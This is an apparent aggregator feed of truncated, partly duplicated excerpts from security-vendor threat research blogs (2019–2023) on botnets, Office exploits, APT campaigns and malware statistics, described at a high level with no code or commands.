blogs_fortinet·2023-05-08·CVSS 9.8
CVE-2023-25717 [CRITICAL] AndoryuBot – New Botnet Campaign Targets Ruckus Wireless Admin Remote Code Execution Vulnerability (CVE-2023-25717)b| FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
AndoryuBot – New Botnet Campaign Targets Ruckus Wireless Admin Remote Code Execution Vulnerability (CVE-2023-25717)
By Cara Lin | May 08, 2023
Affected platforms: Linux
Impacted parties: Any organization
Impact: Remote attackers gain control of vulnerable systems
Severity level: Critical
In April, FortiGuard Labs observed a unique botnet based on the SOCKS protocol distributed through the Ruckus vulnerability (CVE-2023-25717). This botnet, known as AndoryuBot, first appeared in February 2023. It contains DDoS attack modules for different protocols and communicates with its command-and-control server using SOCKS5 proxies. Based on our IPS signatures trigger count (Figure 1), this campaign started distributing the current version sometime after mid-April.
Fortinet
Moobot Strikes Again - Targeting Cacti And RealTek Vulnerabilities | FortiGuard Labs
blogs_fortinet·2023-03-29·CVSS 9.8
[CRITICAL] Moobot Strikes Again - Targeting Cacti And RealTek Vulnerabilities | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Moobot Strikes Again - Targeting Cacti And RealTek Vulnerabilities
By Cara Lin | March 29, 2023
Affected platforms: Windows, Linux
Impacted parties: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity level: Critical
FortiGuard Labs observed several attacking bursts targeting Cacti and Realtek vulnerabilities in January and March of this year and then spreading ShellBot and Moobot malware. (Figure 1 shows trigger counts from our IPS signatures of the CVE-2021-35394 (Realtek) and CVE-2022-46169 (Cacti) vulnerabilities.)
ShellBot is a malware developed in Perl that uses the Internet Relay Chat (IRC) protocol to communicate with the server, also known as PerlBot. Moobot is a Mirai variant botnet that targets exposed net
Securelist
IT threat evolution in Q3 2022. Non-mobile statistics
blogs_securelist·2022-11-18
IT threat evolution in Q3 2022. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Number of users attacked by banking malware
TOP 10 banking malware families
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by criminals during cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
TOP 20 threats for macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks via web resources
Countries and territories that serve as sources of web-ba
Securelist
PC malware statistics, Q3 2022
blogs_securelist·2022-11-18
PC malware statistics, Q3 2022
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by criminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q3 2022
- IT threat evolution in Q3 2022. Non-mobile statistics
- IT threat evolution in Q3 2022. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3 2022:
- Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe.
- Web Anti-Virus recognized 251,288,987 unique URLs as malicious.
- Attempts to run malware fo
Talos
New campaign uses government, union-themed lures to deliver Cobalt Strike beacons
blogs_talos·2022-09-28·CVSS 7.8
[HIGH] New campaign uses government, union-themed lures to deliver Cobalt Strike beacons
- Cisco Talos discovered a malicious campaign in August 2022 delivering Cobalt Strike beacons that could be used in later, follow-on attacks.
- Lure themes in the phishing documents in this campaign are related to the job details of a government organization in the United States and a trade union in New Zealand.
- The attack involves a multistage and modular infection chain with fileless, malicious scripts.
Cisco Talos recently discovered a malicious campaign with a modularised attack technique to deliver Cobalt Strike beacons on infected endpoints.
The initial vector of this attack is a phishing email with a malicious Microsoft Word document attachment containing an exploit that attempts to exploit the vulnerability CVE-2017-0199, a remote code execution issue in Microsoft Office. If a
Talos
New campaign uses government, union-themed lures to deliver Cobalt Strike beacons
blogs_talos·2022-09-28·CVSS 7.8
[HIGH] New campaign uses government, union-themed lures to deliver Cobalt Strike beacons
## New campaign uses government, union-themed lures to deliver Cobalt Strike beacons
Cisco Talos discovered a malicious campaign in August 2022 delivering Cobalt Strike beacons that could be used in later, follow-on attacks.
Lure themes in the phishing documents in this campaign are related to the job details of a government organization in the United States and a trade union in New Zealand.
The attack involves a multistage and modular infection chain with fileless, malicious scripts.
Cisco Talos recently discovered a malicious campaign with a modularised attack technique to deliver Cobalt Strike beacons on infected endpoints.
The initial vector of this attack is a phishing email with a malicious Microsoft Word document attachment containing an exploit that attempts to exploit the vul
Tenable
Cybersecurity Snapshot: 6 Things That Matter Right Now
blogs_tenable·2022-08-19
Cybersecurity Snapshot: 6 Things That Matter Right Now
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Fortinet
Life After Death—SmokeLoader Continues to Haunt Using Old Vulnerabilities
blogs_fortinet·2022-08-09·CVSS 7.8
[HIGH] Life After Death—SmokeLoader Continues to Haunt Using Old Vulnerabilities
FORTIGUARD LABS THREAT RESEARCH
Life After Death—SmokeLoader Continues to Haunt Using Old Vulnerabilities
By James Slaughter | August 09, 2022
Vulnerability management and remediation are some of the most difficult problems to tackle within an organization. Multiple solutions, watchlists, and warnings are designed to ensure that companies and end users patch their software against known security vulnerabilities.
Unfortunately, even with tools available and teams forewarned with up-to-date information, this often does not happen in a timely manner or even at all. This is usually due to outdated software, overworked teams, or even negligence or incompetence—and threat actors know this. Patching is often mundane and tedious work. Organizations that are either late, inconsistent, or sloppy
Tenable
Analyzing the Vulnerabilities Associated with the Top Malware Strains of 2021
blogs_tenable·2022-08-04
Analyzing the Vulnerabilities Associated with the Top Malware Strains of 2021
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Securelist
CVE-2022-30190 (Follina) vulnerability in MSDT: description and counteraction
blogs_securelist·2022-06-06·CVSS 7.8
CVE-2022-30190 [HIGH] CVE-2022-30190 (Follina) vulnerability in MSDT: description and counteraction
Table of Contents
CVE-2022-30190 technical details
Protecting against Follina
Authors
AMR
At the end of May, researchers from the nao_sec team reported a new zero-day vulnerability in Microsoft Support Diagnostic Tool (MSDT) that can be exploited using Microsoft Office documents. It allowed attackers to remotely execute code on Windows systems, while the victim could not even open the document containing the exploit, or open it in Protected Mode. The vulnerability, which the researchers dubbed Follina, later received the identifier CVE-2022-30190 .
## CVE-2022-30190 technical details
Briefly, the exploitation of the CVE-2022-30190 vulnerability can be described as follows. The attacker creates an MS Office document with a link to an external malicious OLE object ( word/_rels/documen
Securelist
CVE-2022-30190 (Follina) vulnerability in MSDT: description and counteraction
blogs_securelist·2022-06-06·CVSS 7.8
CVE-2022-30190 [HIGH] CVE-2022-30190 (Follina) vulnerability in MSDT: description and counteraction
Table of Contents
- CVE-2022-30190 technical details
- Protecting against Follina
Authors
- AMR
At the end of May, researchers from the nao_sec team reported a new zero-day vulnerability in Microsoft Support Diagnostic Tool (MSDT) that can be exploited using Microsoft Office documents. It allowed attackers to remotely execute code on Windows systems, while the victim could not even open the document containing the exploit, or open it in Protected Mode. The vulnerability, which the researchers dubbed Follina, later received the identifier CVE-2022-30190.
## CVE-2022-30190 technical details
Briefly, the exploitation of the CVE-2022-30190 vulnerability can be described as follows. The attacker creates an MS Office document with a link to an external malicious OLE object (word/_rels/doc
Huntress
Rapid Response: Microsoft Office RCE - “Follina” MSDT Attack | Huntress
blogs_huntress·2022-05-30·CVSS 7.8
[HIGH] Rapid Response: Microsoft Office RCE - “Follina” MSDT Attack | Huntress
This post, as is the norm for emerging threats, is a developing article and may be subject to change as the Huntress team learns more about this attack vector and new information is available.
UPDATE 4:51pm ET June 14, 2022:
Microsoft announced an available patch for the Follina exploit. Our team has been working to validate the patch, and we have tested and verified that the patch is effective both for Windows 10 and Windows 11:
Just to note, your KB# may vary based on your operating system—check out Microsoft's update for the full list.
Below, the code fails to execute on Windows 10:
In the below image, the raw command fails on Windows 10:
UPDATE 11:16pm ET May 30, 2022:
Microsoft has now revealed the CVE identifier for this vulnerability is CVE-2022-30190 , including a Security U
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Securelist
The BlueNoroff cryptocurrency hunt is still on
blogs_securelist·2022-01-13
The BlueNoroff cryptocurrency hunt is still on
Table of Contents
- The latest BlueNoroff’s infection vector
- Malware infection
- Assets theft
- SnatchCrypto’s victims
- SnatchCrypto’s attribution
- BlueNoroff’s indicators of compromise
- Powershell agent(VBS-wrapped)
Authors
- Seongsu Park
- Vitaly Kamluk
BlueNoroff is the name of an APT group coined by Kaspersky researchers while investigating the notorious attack on Bangladesh’s Central Bank back in 2016. A mysterious group with links to Lazarus and an unusual financial motivation for an APT. The group seems to work more like a unit within a larger formation of Lazarus attackers, with the ability to tap into its vast resources: be it malware implants, exploits, or infrastructure. See our earlier publication about BlueNoroff attacks on the banking sector.
Also, we have previous
Securelist
The BlueNoroff cryptocurrency hunt is still on
blogs_securelist·2022-01-13
The BlueNoroff cryptocurrency hunt is still on
Table of Contents
The latest BlueNoroff’s infection vector
Malware infection
Infection chain #1. Windows shortcut
Infection chain #2. Weaponized Word document
Assets theft
Collecting credentials
Stealing cryptocurrency
SnatchCrypto’s victims
SnatchCrypto’s attribution
VBA macro authorship
PowerShell scripts overlap
Backdoor overlap
BlueNoroff’s indicators of compromise
Powershell agent(VBS-wrapped)
Authors
Seongsu Park
Vitaly Kamluk
BlueNoroff is the name of an APT group coined by Kaspersky researchers while investigating the notorious attack on Bangladesh’s Central Bank back in 2016. A mysterious group with links to Lazarus and an unusual financial motivation for an APT. The group seems to work more like a unit within a larger formation of Lazarus attackers, with the abi
Fortinet
SHODAN Your ICS Network – The BACnet Story | Fortinet
blogs_fortinet·2021-10-27
SHODAN Your ICS Network – The BACnet Story | Fortinet
FORTINET NEWS & UPDATES
SHODAN Your ICS Network – The BACnet Story
By Moshe Ben Simon | October 27, 2021
Mapping the entire ICS network using a single BBMD device
Shodan is a search engine similar to Google, but instead of searching for websites it searches for internet-connected devices—from routers and servers to Internet of Things (IoT) and OT devices. It can find any connected device, from thermostats and baby monitors to complex tools like SCADA systems that govern a wide range of industries, including energy, power, and transportation.
The Shodan Project's main goal was to search for devices linked to the Internet, but its goodwill became problematic as soon as Shodan began discovering industrial supervisory control and data acquisition (SCADA) systems, security cameras, traffic l
Trendmicro
FormBook Adds Latest Office 365 0-Day Vulnerability CVE-2021-40444 to Its Arsenal
blogs_trendmicro·2021-09-29·CVSS 7.8
CVE-2021-40444 [HIGH] FormBook Adds Latest Office 365 0-Day Vulnerability CVE-2021-40444 to Its Arsenal
Exploits & Vulnerabilities
## FormBook Adds Latest Office 365 0-Day Vulnerability (CVE-2021-40444) to Its Arsenal
Trend Micro detected a new campaign using a recent version of the known FormBook infostealer. Newer FormBook variants used the recent Office 365 zero-day vulnerability, CVE-2021-40444.
By: Trend Micro Sep 29, 2021 Read time: ( words)
Save to Folio
Trend Micro detected a new campaign using a recent version of the known FormBook malware, an infostealer that has been around since 2016. Several analyses have been written about FormBook in the last few years, including the expanded support for macOS. FormBook is famous for highly obfuscated payloads and the use of document CVE exploitation. Until recently, FormBook mostly exploited CVE-2017-0199 , but newer FormBook variants us
Fortinet
Microsoft MSHTML Remote Code Execution Vulnerability Exploited in the Wild (CVE-2021-40444) | FortiGuard Labs
blogs_fortinet·2021-09-09·CVSS 8.8
CVE-2021-40444 [HIGH] Microsoft MSHTML Remote Code Execution Vulnerability Exploited in the Wild (CVE-2021-40444) | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Microsoft MSHTML Remote Code Execution Vulnerability Exploited in the Wild (CVE-2021-40444)
By Val Saengphaibul | September 09, 2021
FortiGuard Labs Threat Research Report
On September 7, 2021, Microsoft disclosed an active in-the-wild attack affecting Microsoft Windows. This vulnerability, CVE-2020-40444, is a remote code execution vulnerability in MSHTML. It does not currently have a patch, MSHTML is also referred to as Trident, is a legacy proprietary browser engine specific to Internet Explorer and Windows platforms. In-the-wild attacks on targets were observed to be using specially crafted malicious Microsoft Office documents. Like most such attacks, targets have to be compelled or lured to open the malicious document for it to run successfully.
Thi
Securelist
APT trends report Q2 2021
blogs_securelist·2021-07-29
APT trends report Q2 2021
Table of Contents
The most remarkable findings
Russian-speaking activity
Chinese-speaking activity
Middle East
Southeast Asia and Korean Peninsula
Other interesting discoveries
Final thoughts
Authors
GReAT
For more than four years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.
This is our latest installment, focusing on activities that we observed during Q2 2021.
Readers who would like to learn
Securelist
APT trends report Q2 2021
blogs_securelist·2021-07-29
APT trends report Q2 2021
Table of Contents
- The most remarkable findings
- Russian-speaking activity
- Chinese-speaking activity
- Middle East
- Southeast Asia and Korean Peninsula
- Other interesting discoveries
- Final thoughts
Authors
- GReAT
For more than four years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.
This is our latest installment, focusing on activities that we observed during Q2 2021.
Readers who would lik
Fortinet
Signed, Sealed, and Delivered – Signed XLL File Delivers Buer Loader | FortiGuard Labs
blogs_fortinet·2021-07-19
Signed, Sealed, and Delivered – Signed XLL File Delivers Buer Loader | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Signed, Sealed, and Delivered – Signed XLL File Delivers Buer Loader
By Val Saengphaibul and Fred Gutierrez | July 19, 2021
FortiGuard Labs has discovered a malicious spam campaign that uses the names of two well-known corporate entities as a social engineering lure to trick a target into opening a maliciously crafted Microsoft Excel document. When opened, the document contacts a remote server that downloads a malicious payload from a predefined website. What makes this campaign different from similar malicious spam campaigns is the use of a signed Microsoft Excel file with an .XLL file extension, rather than the standard .XLS file extension.
In this blog, we will examine details of this attack as well as the infrastructure they used. The reader will see
Tenable
Daisy Chaining: How Vulnerabilities Can Be Greater Than the Sum of Their Parts
blogs_tenable·2021-01-21
Daisy Chaining: How Vulnerabilities Can Be Greater Than the Sum of Their Parts
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Securelist
IT threat evolution Q3 2020. Non-mobile statistics
blogs_securelist·2020-11-20
IT threat evolution Q3 2020. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Attack geography
Ransomware programs
Quarterly trends and highlights
Number of new modifications
Number of users attacked by ransomware Trojans
Attack geography
Miners
Number of new modifications
Number of users attacked by miners
Attack geography
Vulnerable applications used by cybercriminals during cyberattacks
Attacks on macOS
Threat geography
IoT attacks
IoT threat statistics
Attacks via web resources
Countries that are sources of web-based attacks: Top 10
Countries where users faced the greatest risk of online infection
Local threats
Countries where users faced the highest risk of local infection
Authors
Victor Chebyshev
Fedor Sinitsyn
Denis Parinov
Oleg Kupreev
Evgeny Lopati
Securelist
IT threat evolution Q3 2020. Non-mobile statistics
blogs_securelist·2020-11-20
IT threat evolution Q3 2020. Non-mobile statistics
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Oleg Kupreev
- Evgeny Lopatin
- Alexey Kulaev
- Alexander Kolesnikov
These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3:
- Kaspersky solutions blocked 1,416,295,227 attacks launched from online resources across the globe.
- 456,573,467 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempts to run malware for stealing
Securelist
IT threat evolution Q2 2020. PC statistics
blogs_securelist·2020-09-03
IT threat evolution Q2 2020. PC statistics
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals during cyberattacks
- Attacks on Apple macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Evgeny Lopatin
- Fedor Sinitsyn
- Denis Parinov
- Oleg Kupreev
- Alexey Kulaev
- Alexander Kolesnikov
IT threat evolution Q2 2020. Review
IT threat evolution Q2 2020. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2:
- Kaspersky solutions blocked 899,744,810 attacks launched from online resources in 191 countries across the globe.
- As many as 286,
Securelist
IT threat evolution Q2 2020. PC statistics
blogs_securelist·2020-09-03
IT threat evolution Q2 2020. PC statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Ransomware programs
Quarterly trend highlights
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacks
Top 10 most common families of ransomware Trojans
Miners
Number of new modifications
Number of users attacked by miners
Geography of attacks
Vulnerable applications used by cybercriminals during cyberattacks
Attacks on Apple macOS
Threat geography
IoT attacks
IoT threat statistics
Threats loaded into traps
Attacks via web resources
Countries that are sources of web-based attacks: TOP 10
Countries where users faced the greatest risk of online infection
Local threats
Countries where users faced the highest risk of local infection
Authors
Victor
Sentinelone
The BLINDINGCAN RAT and Malicious North Korean Activity
blogs_sentinelone·2020-08-31
The BLINDINGCAN RAT and Malicious North Korean Activity
There has been a great deal of coverage lately around malicious activities attributed to North Korea (and/or adjacent entities ). Most recently, this has culminated in the release of MAR (Malware Analysis Report) AR20-232A , which covers activities associated with the BLINDINGCAN RAT . This tool is the latest in a very long line of tools which allow attackers to maintain access to target environments as well as establish ongoing control of infected hosts. In this post, we give an overview of this campaign in context of other related campaigns, describing its infection vector, execution and high-level behavior.
## Infection Vector
As we know, email phishing attacks are still the dominant method of delivering malware when it comes to these types of attacks. The BLINDINGCAN campaigns are no
Sentinelone
The BLINDINGCAN RAT and Malicious North Korean Activity
blogs_sentinelone·2020-08-31
The BLINDINGCAN RAT and Malicious North Korean Activity
There has been a great deal of coverage lately around malicious activities attributed to North Korea (and/or adjacent entities). Most recently, this has culminated in the release of MAR (Malware Analysis Report) AR20-232A, which covers activities associated with the BLINDINGCAN RAT. This tool is the latest in a very long line of tools which allow attackers to maintain access to target environments as well as establish ongoing control of infected hosts. In this post, we give an overview of this campaign in context of other related campaigns, describing its infection vector, execution and high-level behavior.
## Infection Vector
As we know, email phishing attacks are still the dominant method of delivering malware when it comes to these types of attacks. The BLINDINGCAN campaigns are no di
Unit42
The State of Exploit Development: 80% of Exploits Publish Faster than CVEs
blogs_unit42·2020-08-26
The State of Exploit Development: 80% of Exploits Publish Faster than CVEs
Threat Research Center
Threat Research
Vulnerabilities
## The State of Exploit Development: 80% of Exploits Publish Faster than CVEs
Jay Chen
Published: August 26, 2020
Threat Research
Vulnerabilities
Exploit
## Executive Summary
With the ever-increasing number of new vulnerabilities, vulnerability management becomes one of the most critical processes in ensuring continuous business operation. While it is clear that timely patching is essential, it’s also important to know quantitatively how a delay could increase risk. What is the chance that attackers breach my organization using a CVE just disclosed or using an unknown (zero-day) vulnerability? To understand the state of vulnerability disclosure and exploit development, Unit 42 researchers analyzed 45,450 publicly availabl
Unit42
The State of Exploit Development: 80% of Exploits Publish Faster than CVEs
blogs_unit42·2020-08-26
The State of Exploit Development: 80% of Exploits Publish Faster than CVEs
## Executive Summary
With the ever-increasing number of new vulnerabilities, vulnerability management becomes one of the most critical processes in ensuring continuous business operation. While it is clear that timely patching is essential, it’s also important to know quantitatively how a delay could increase risk. What is the chance that attackers breach my organization using a CVE just disclosed or using an unknown (zero-day) vulnerability? To understand the state of vulnerability disclosure and exploit development, Unit 42 researchers analyzed 45,450 publicly available exploits in Exploit Database at the time of this writing. The research correlated the exploit data with vulnerability and patch information to study exploit development in multiple facets.
The research reveals that:
-
Sentinelone
Why On-Device Detection Matters: New Ramsay Trojan Targets Air-Gapped Networks
blogs_sentinelone·2020-05-20·CVSS 7.8
[HIGH] Why On-Device Detection Matters: New Ramsay Trojan Targets Air-Gapped Networks
The Ramsay “framework” emerged in late 2019 and was disclosed thanks to a discovery by researchers querying the VirusTotal public malware repository. As of April 2020, there appears to be two fully maintained branches of the toolkit. Although in-the-wild instances of the Ramsay malware appear to be low at present, this may be due to the malware’s highly-specialized objectives. The Ramsay samples discovered to date are heavily focused on both persistence and data exfiltration from air-gapped environments. This suggests the possibility that the malware was developed for advanced targeted campaigns by a threat actor primarily interested in organizations trying to protect the most-sensitive of information. As is often the case with specialized malware, there is also a real danger of it “leakin
Sentinelone
Why On-Device Detection Matters: New Ramsay Trojan Targets Air-Gapped Networks
blogs_sentinelone·2020-05-20·CVSS 7.8
[HIGH] Why On-Device Detection Matters: New Ramsay Trojan Targets Air-Gapped Networks
The Ramsay “framework” emerged in late 2019 and was disclosed thanks to a discovery by researchers querying the VirusTotal public malware repository. As of April 2020, there appears to be two fully maintained branches of the toolkit. Although in-the-wild instances of the Ramsay malware appear to be low at present, this may be due to the malware’s highly-specialized objectives. The Ramsay samples discovered to date are heavily focused on both persistence and data exfiltration from air-gapped environments. This suggests the possibility that the malware was developed for advanced targeted campaigns by a threat actor primarily interested in organizations trying to protect the most-sensitive of information. As is often the case with specialized malware, there is also a real danger of it “leakin
Unit42
COVID-19 Themed Malware Within Cloud Environments
blogs_unit42·2020-05-11
COVID-19 Themed Malware Within Cloud Environments
## Executive Summary
Unit 42 researchers found that public cloud infrastructure has communicated with domains known to distribute COVID-19 themed malware. On March 24, 2020, Unit 42 published a blog discussing attack patterns used by malicious actors in relation to the novel Coronavirus (COVID-19). Taking these findings a step further, researchers attempted to uncover if there are malicious COVID-19 related events taking place within public cloud infrastructure. If indications of this activity were found, how could organizations protect themselves?
Researchers identified 300+ COVID-19 themed malware samples that communicated with 20 unique IP addresses and domain indicators of compromise (IOCs). After querying Prisma Cloud for network connections to these 20 suspicious IOCs between March
Unit42
COVID-19 Themed Malware Within Cloud Environments
blogs_unit42·2020-05-11
COVID-19 Themed Malware Within Cloud Environments
Threat Research Center
Threat Research
Cloud Cybersecurity Research
## COVID-19 Themed Malware Within Cloud Environments
Nathaniel Quist
Published: May 11, 2020
Cloud Cybersecurity Research
Malware
Threat Research
COVID
NetFlow
## Executive Summary
Unit 42 researchers found that public cloud infrastructure has communicated with domains known to distribute COVID-19 themed malware. On March 24, 2020, Unit 42 published a blog discussing attack patterns used by malicious actors in relation to the novel Coronavirus (COVID-19). Taking these findings a step further, researchers attempted to uncover if there are malicious COVID-19 related events taking place within public cloud infrastructure. If indications of this activity were found, how could organizations protect themselves?
Tenable
Critical Vulnerabilities You Need to Find and Fix to Protect the Remote Workforce
blogs_tenable·2020-04-13
Critical Vulnerabilities You Need to Find and Fix to Protect the Remote Workforce
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Management (CSPM)
Compliance
Cyber insurance
Data Security Posture Management (DSPM)
Google Cloud security
Infrastructure as Code (IaC) security
Kubernetes Security Pos
Fortinet
Offense and Defense – A Tale of Two Sides: Bypass UAC | FortiGuard Labs
blogs_fortinet·2020-04-01
Offense and Defense – A Tale of Two Sides: Bypass UAC | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Offense and Defense – A Tale of Two Sides: Bypass UAC
By Anthony Giandomenico | April 01, 2020
FortiGuard Labs Threat Analysis Report
This is the 2nd installment of the “Offense and Defense – A Tale of Two Sides” blog series, where we focus on different tactics and techniques malicious actors use to complete their cyber missions—and how organizations can detect and ultimately prevent them. You can check out the blog series at Offense and Defense – A Tale of Two Sides: Group Policy and Logon Scripts, Offense and Defense – A Tale of Two Sides: PowerShell, and Offense and Defense – A Tale of Two Sides: OS Credential Dumping.
Introduction
In this month’s “Offense and Defense – A Tale of Two Sides” blog, we will be walking through a new technique in sequence
Fortinet
The Curious Case of DeathRansom: Part I
blogs_fortinet·2020-01-02
The Curious Case of DeathRansom: Part I
FORTIGUARD LABS THREAT RESEARCH
The Curious Case of DeathRansom: Part I
By Minh Tran | January 02, 2020
AFortiGuard Labs Threat Analysis Report
Introduction
Ransomware is certainly a significant global threat. According to one recent report, ransomware is estimated to have cost businesses more than $8 billion in 2018, up from just $1 billion in 2016, while this year alone losses for the healthcare industry have already reached $25 billion.
Part of this increase is due to the rise of Ransomware as a Service, with variants such as GandCrab generating as much as $2 billion in revenue for its developers, and our observation in the FortiGuard Labs Threat Landscape Report for Q3 that two additional ransomware families – Sodinokibi and Nemty – have now been deployed as RaaS solutions as well
Qualys
Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking
blogs_qualys·2019-12-27·CVSS 8.8
[HIGH] Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking
A recent report identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advance Persistent Threat (APT) actors from all parts of the world.
The list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.
No.
CVE
Products Affected by CVE
CVSS Score (NVD)
Examples of Threat Actors
1
CVE-2017-11882
Microsoft Office
7.8
APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia)
2
Qualys
Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking | Qualys
blogs_qualys·2019-12-27·CVSS 8.8
[HIGH] Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking | Qualys
A recent report identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advance Persistent Threat (APT) actors from all parts of the world.
The list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.
No.
CVE
Products Affected by CVE
CVSS Score (NVD)
Examples of Threat Actors
1
CVE-2017-11882
Microsoft Office
7.8
APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia)
2
CVE-2018-
Securelist
RevengeHotels: cybercrime targeting hotel front desks worldwide
blogs_securelist·2019-11-28·CVSS 7.8
[HIGH] RevengeHotels: cybercrime targeting hotel front desks worldwide
Authors
GReAT
RevengeHotels is a targeted cybercrime malware campaign against hotels, hostels, hospitality and tourism companies, mainly, but not exclusively, located in Brazil. We have confirmed more than 20 hotels that are victims of the group, located in eight states in Brazil, but also in other countries such as Argentina, Bolivia, Chile, Costa Rica, France, Italy, Mexico, Portugal, Spain, Thailand and Turkey. The goal of the campaign is to capture credit card data from guests and travelers stored in hotel systems, as well as credit card data received from popular online travel agencies (OTAs) such as Booking.com.
